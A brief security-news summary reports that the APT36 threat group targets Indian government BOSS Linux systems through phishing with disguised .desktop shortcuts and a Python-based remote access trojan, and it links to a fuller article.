A powerful threat actor known as APT36 has advanced its cyberattack techniques, now focusing on Linux-based systems used by the Indian government. The campaign involves sophisticated malware that targets Bharat Operating System Solutions (BOSS) Linux environments to maintain covert access and espionage capabilities. #APT36 #BOSSLinux #IndianGovernment
Keypoints
- APT36 has shifted from targeting Windows to developing tools for Linux environments used by Indian government sectors.
- The attacker delivers malware through spear-phishing emails with a disguised Linux shortcut (.desktop) file.
- The malware uses a multi-stage stealthy process, including downloading a remote RAT and establishing persistence with systemd.
- The core payload, swcbc, is a cross-platform Python-based RAT with espionage features like file exfiltration and screen capture.
- The campaign highlights APT36βs increasing technical mastery and focus on indigenous platforms for strategic espionage.
Read More: https://securityonline.info/the-boss-breach-apt36-pivots-to-linux-espionage-with-silent-shortcuts/